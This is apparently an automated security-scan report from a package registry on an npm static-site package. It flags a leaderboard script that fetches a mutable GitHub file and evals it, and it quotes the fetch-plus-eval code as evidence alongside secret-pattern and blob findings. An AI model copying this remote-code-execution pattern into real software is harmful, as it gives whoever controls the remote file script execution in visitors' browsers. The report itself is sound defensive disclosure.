registry  /  grapes-andrewdingus  /  1.0.32

grapes-andrewdingus@1.0.32

GRAPES OS static site — CDN-ready via unpkg

AI Security Review

scanned 6h ago · by lpm-firewall-ai

The package ships a static site page that executes mutable remote JavaScript from GitHub at runtime. No install-time behavior was found, but visiting the leaderboard page gives the remote scores file arbitrary script execution in the page context.

Static reason
High-risk behavior combination matched malicious policy.; source matched previously finalized malicious package; routed for review; source fingerprint signature matched known malicious package; routed for review
Trigger
Browser visit to leaderboard.html
Impact
Remote maintainer or compromised GitHub content can execute arbitrary browser-side code in the package site context.
Mechanism
fetch remote JavaScript and eval it
Attack narrative
When leaderboard.html is opened, it loads assets/js/leaderboard.js. That script fetches a mutable scores.js file from raw.githubusercontent.com and passes the response directly to eval, allowing the remote file to execute arbitrary JavaScript in visitors' browsers under the static site's context.
Rationale
Direct source inspection confirms runtime remote-code execution via fetch plus eval from a mutable GitHub URL. The behavior is not install-time malware, but it is a concrete unpinned remote execution backdoor surface in an npm-distributed static site.
Evidence
package.jsonleaderboard.htmlassets/js/leaderboard.jsassets/js/app_functions.jsprepare-unpkg.ps1
Network endpoints2
raw.githubusercontent.com/grapes-os/grapes-os-leaderboard/main/scores.jshqlgppguxhqeaonjzinv.supabase.co

Decision evidence

public snapshot
AI called this Malicious at 94.0% confidence as Dangerous Capability with low false-positive risk.
Evidence for block
  • assets/js/leaderboard.js fetches https://raw.githubusercontent.com/grapes-os/grapes-os-leaderboard/main/scores.js
  • assets/js/leaderboard.js immediately evals fetched remote text in main()
  • leaderboard.html loads assets/js/leaderboard.js with defer, activating on page visit
  • Remote code runs in browser origin and can access DOM/storage for the static site
Evidence against
  • package.json has no npm lifecycle scripts or bin entrypoints
  • No install-time filesystem writes or AI-agent control-surface mutation found
  • assets/js/app_functions.js Supabase key is an anon browser key used for app listing RPC
  • prepare-unpkg.ps1 is a publish helper copying CSS only
Behavioral surface
Source
EvalNetwork
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 9 file(s), 41.9 KB of source, external domains: 1.australianhuntermag.com.au, 1.belizebuilders.com, 1.burgermap.org, 1.chowpatty.com, 1.deleesportsmedicine.com, 1.lscomm.net, 1.oceanracingseries.co.za, 1.rodolfocolen.com, 1.room4rent.cl, 1.rootsbobcat.com, 1.southwestvoodoo.com, 1.tartsandcrafts.ca, 1.tomholden.info, 1.videospeed.cl, 1.vivocolor.cl, 2.intothelightprod.com, 2.macao.net, 57.admain.cl, acetaminophen.deleesportsmedicine.com, acting.intothelightprod.com, adsadkjsadjksakldjxx.math-solver.online, agent.room4rent.cl, alpha.y.glenwaverleychurches.org, antihistamines.medscience.cl, api.cloud.rigaprecast.com, app.cloud.rigaprecast.com, attractions.uk.to, aurora.xyz.moochurch.com, b.j0.icom.org.np, backend.development.sanluix.org, basketball.prosports.cl, behavior.lasersoft.net.au, beta.y.glenwaverleychurches.org, biology-img.shekinahphotography.com, blog.cloud.rigaprecast.com, boeing.morlockaerospace.com, books.michelleingah.com, ca.skimanshop.it, carriers.mobile-node.net, cdn.businessrelay.co.za, cdn.i-mind.cl, cdn.masonic-lodge.ca, cdn.yourciooncall.com, cheap.showmyhomes.com, cheap.winterhouse.info, china.dingshun.hk, china.taoism-dingshun.org, construct.rustyfoundation.com, coolmathgames.com, cultures.linexedu.eu

Source & flagged code

10 flagged · loading source
assets/js/app_functions.jsView file
3patternName = supabase_service_key severity = critical line = 3 matchedText = "eyJhbGc...w8";
Critical
Critical Secret

Package contains a critical-looking secret pattern.

assets/js/app_functions.jsView on unpkg · L3
3patternName = supabase_service_key severity = critical line = 3 matchedText = "eyJhbGc...w8";
Critical
Secret Pattern

Supabase service role key (JWT) in assets/js/app_functions.js

assets/js/app_functions.jsView on unpkg · L3
assets/js/leaderboard.jsView file
36async function getScores() { L37: let response = await fetch( L38: "https://raw.githubusercontent.com/grapes-os/grapes-os-leaderboard/main/scores.js", L39: ); L40: return await response.text(); // is promise for whatever reason L41: } ... L45: let js_code = await getScores(); L46: eval(js_code); // never use eval L47: } catch (e) {
Critical
Remote Asset Decode Execute

Source fetches a remote non-code asset, decodes its contents, and dynamically executes the decoded payload.

assets/js/leaderboard.jsView on unpkg · L36
45let js_code = await getScores(); L46: eval(js_code); // never use eval L47: } catch (e) {
High
Eval

Package source references dynamic code evaluation.

assets/js/leaderboard.jsView on unpkg · L45
matchType = normalized_sha256 matchedPackage = grapes-andrewdingus@1.0.30 matchedPath = assets/js/leaderboard.js matchedIdentity = npm:Z3JhcGVzLWFuZHJld2Rpbmd1cw:1.0.30 similarity = 1.000 summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

assets/js/leaderboard.jsView on unpkg
matchType = malicious_source_fingerprint_signature signature = 26a6083a366a497c signatureType = suspicious_hashes sourceLabel = final_verdict:malicious matchedPackage = grapes-andrewdingus@1.0.30 matchedPath = assets/js/leaderboard.js matchedIdentity = npm:Z3JhcGVzLWFuZHJld2Rpbmd1cw:1.0.30 similarity = 1.000 shingleOverlap = 5 summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

assets/js/leaderboard.jsView on unpkg
prepare-unpkg.ps1View file
path = prepare-unpkg.ps1 kind = build_helper sizeBytes = 468 magicHex = [redacted]
Medium
Ships Build Helper

Package ships non-JavaScript build or shell helper files.

prepare-unpkg.ps1View on unpkg
grapes-andrewdingus-1.0.31.tgzView file
path = grapes-andrewdingus-1.0.31.tgz kind = high_entropy_blob sizeBytes = 16415023 magicHex = [redacted]
High
Ships High Entropy Blob

Package ships high-entropy non-source blobs.

grapes-andrewdingus-1.0.31.tgzView on unpkg
path = grapes-andrewdingus-1.0.31.tgz kind = compressed_blob sizeBytes = 16415023 magicHex = [redacted]
Medium
Ships Compressed Blob

Package ships compressed or archive-like blobs.

grapes-andrewdingus-1.0.31.tgzView on unpkg
path = grapes-andrewdingus-1.0.31.tgz kind = nested_archive_needs_inspection sizeBytes = 16415023 magicHex = [redacted]
Low
Nested Archive Needs Inspection

Package ships a nested archive or MCP bundle that was inventoried but not recursively analyzed.

grapes-andrewdingus-1.0.31.tgzView on unpkg

Findings

3 Critical4 High4 Medium3 Low
CriticalCritical Secretassets/js/app_functions.js
CriticalRemote Asset Decode Executeassets/js/leaderboard.js
CriticalSecret Patternassets/js/app_functions.js
HighEvalassets/js/leaderboard.js
HighShips High Entropy Blobgrapes-andrewdingus-1.0.31.tgz
HighKnown Malware Source Similarityassets/js/leaderboard.js
HighKnown Malware Source Fingerprint Signatureassets/js/leaderboard.js
MediumNetwork
MediumShips Build Helperprepare-unpkg.ps1
MediumShips Compressed Blobgrapes-andrewdingus-1.0.31.tgz
MediumStructural Risk Force Deep Review
LowHigh Entropy Strings
LowUrl Strings
LowNested Archive Needs Inspectiongrapes-andrewdingus-1.0.31.tgz